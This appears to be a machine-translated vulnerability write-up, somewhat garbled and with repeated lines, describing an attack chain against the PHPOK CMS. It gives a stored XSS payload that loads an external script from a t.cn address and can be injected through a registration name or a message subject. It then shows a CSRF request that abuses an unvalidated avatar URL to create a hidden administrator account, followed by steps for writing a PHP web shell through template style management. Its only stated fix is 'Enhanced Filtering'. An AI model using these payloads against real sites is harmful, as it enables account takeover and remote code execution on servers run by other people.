Phpok vulnerability package combination shell

Phpok vulnerability package combination shell

 

1.2 rows stored in xss

2. Add the Administrator account password + exploitation point

3. Write shell in the background

1.

First

Register an account first.
 

The account content is

A '); document. write (' <script/src = // t.cn/XXXXXXX> </script> ')//

After registration.



Background
 

 

You need to click to activate xss
 

Second

Message
 

Message Subject

A'); document. write ('<script/src = // t.cn/XXXXX> </script> ')//
 

 

You also need to click
 

2.

Add Administrator Account + exploitation point

Add an administrator account in the background. You can use csrf.

The front-end Avatar address is not verified.


Click Modify materials and capture packets

Modify the avatar value of Post

Admin. php % 3Fc % 3 Dadmin % 26f % 3 Dsave % 26id % 3D % 26 account % 3 Dwooyun % 26 pass % 3Da123456% 26 email % 3Da123456% 26 status % 3D0% 26if_system % 3D1

The value in the figure is url decoded content.
 

Then register an account

Upload Avatar

Modify the Post avatar

Admin. php % 3Fc % 3 Dadmin % 26f % 3 Dstatus % 26id % 3D2



An administrator is automatically generated when the Administrator checks the background.

And the status is available.
 

Then you can log on to the background





3.

You can use the first two parts to enter the background

Then write shell in the background



Background style management

Then add the style
 

Pay attention to this place. A folder can only be a folder in the system.

Therefore, write the www folder that exists by default.
 

 

 

Directly write shell



/Tpl/www/111.php

The Code is as follows:
 

 

 

/Tpl/www/111.php

The Code is as follows:
 

 

Solution:

Enhanced Filtering